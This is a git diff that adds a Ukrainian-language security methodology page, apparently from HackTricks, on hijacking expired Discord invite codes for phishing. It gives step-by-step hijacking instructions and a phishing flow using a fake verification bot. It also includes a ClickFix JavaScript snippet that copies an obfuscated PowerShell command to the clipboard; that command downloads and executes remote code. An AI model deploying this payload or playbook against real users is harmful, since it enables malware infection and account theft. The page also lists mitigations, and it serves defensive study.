Translated ['src/generic-methodologies-and-resources/phishing-methodolog

src/SUMMARY.md

@@ -29,6 +29,7 @@
 - [Phishing Methodology](generic-methodologies-and-resources/phishing-methodology/README.md)
   - [Clone a Website](generic-methodologies-and-resources/phishing-methodology/clone-a-website.md)
   - [Detecting Phishing](generic-methodologies-and-resources/phishing-methodology/detecting-phising.md)
+  - [Discord Invite Hijacking](generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md)
   - [Phishing Files & Documents](generic-methodologies-and-resources/phishing-methodology/phishing-documents.md)
 - [Basic Forensic Methodology](generic-methodologies-and-resources/basic-forensic-methodology/README.md)
   - [Baseline Monitoring](generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md)

src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md

@@ -0,0 +1,61 @@
+# Discord Invite Hijacking
+
+{{#include ../../banners/hacktricks-training.md}}
+
+Вразливість системи запрошень Discord дозволяє зловмисникам отримувати доступ до застарілих або видалених кодів запрошень (тимчасових, постійних або кастомних) як нових посилань на будь-якому сервері з підвищенням рівня 3. Нормалізуючи всі коди до нижнього регістру, зловмисники можуть попередньо зареєструвати відомі коди запрошень і тихо перехопити трафік, як тільки оригінальне посилання закінчує термін дії або сервер-джерело втрачає своє підвищення.
+
+## Типи запрошень та ризик перехоплення
+
+| Тип запрошення       | Можна перехопити? | Умови / Коментарі                                                                                       |
+|-----------------------|-------------------|------------------------------------------------------------------------------------------------------------|
+| Тимчасове посилання   | ✅                | Після закінчення терміну дії код стає доступним і може бути повторно зареєстрований як кастомне URL на підвищеному сервері. |
+| Постійне посилання    | ⚠️                | Якщо видалено і складається лише з малих літер та цифр, код може знову стати доступним.                 |
+| Кастомне посилання    | ✅                | Якщо оригінальний сервер втрачає своє підвищення рівня 3, його кастомне запрошення стає доступним для нової реєстрації. |
+
+## Кроки експлуатації
+
+1. Розвідка
+- Моніторинг публічних джерел (форумів, соціальних мереж, каналів Telegram) на наявність посилань на запрошення, що відповідають шаблону `discord.gg/{code}` або `discord.com/invite/{code}`.
+- Збір цікавих кодів запрошень (тимчасових або кастомних).
+2. Попередня реєстрація
+- Створіть або використовуйте існуючий сервер Discord з привілеями підвищення рівня 3.
+- У **Налаштуваннях сервера → Кастомне URL**, спробуйте призначити цільовий код запрошення. Якщо прийнято, код резервується зловмисним сервером.
+3. Активація перехоплення
+- Для тимчасових запрошень чекайте, поки оригінальне запрошення не закінчить термін дії (або видаліть його вручну, якщо ви контролюєте джерело).
+- Для кодів, що містять великі літери, варіант з малими літерами можна отримати негайно, хоча перенаправлення активується лише після закінчення терміну дії.
+4. Тихе перенаправлення
+- Користувачі, які відвідують старе посилання, безперешкодно перенаправляються на сервер, контрольований зловмисником, як тільки перехоплення активується.
+
+## Потік фішингу через сервер Discord
+
+1. Обмежте канали сервера так, щоб лише канал **#verify** був видимим.
+2. Розгорніть бота (наприклад, **Safeguard#0786**), щоб запропонувати новачкам підтвердити через OAuth2.
+3. Бот перенаправляє користувачів на фішинговий сайт (наприклад, `captchaguard.me`) під виглядом CAPTCHA або етапу перевірки.
+4. Реалізуйте трюк UX **ClickFix**:
+- Відобразіть повідомлення про зламану CAPTCHA.
+- Скажіть користувачам відкрити діалог **Win+R**, вставити попередньо завантажену команду PowerShell і натиснути Enter.
+
+### Приклад ін'єкції в буфер обміну ClickFix
+```javascript
+// Copy malicious PowerShell command to clipboard
+const cmd = `powershell -NoExit -Command "$r='NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa';` +
+`$u=($r[-1..-($r.Length)]-join '');` +
+`$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));` +
+`iex (iwr -Uri $url)"`;
+navigator.clipboard.writeText(cmd);
+```
+Цей підхід уникає прямих завантажень файлів і використовує знайомі елементи інтерфейсу, щоб знизити підозру користувачів.
+
+## Заходи пом'якшення
+
+- Використовуйте постійні посилання на запрошення, що містять принаймні одну велику літеру або неалфавітний символ (ніколи не закінчуються, не підлягають повторному використанню).
+- Регулярно змінюйте коди запрошень і відкликайте старі посилання.
+- Моніторте статус підвищення сервера Discord і заяви про унікальні URL.
+- Навчайте користувачів перевіряти автентичність сервера та уникати виконання команд, вставлених з буфера обміну.
+
+## Посилання
+
+- From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery – https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/
+- Discord Custom Invite Link Documentation – https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link
+
+{{#include /banners/hacktricks-training.md}}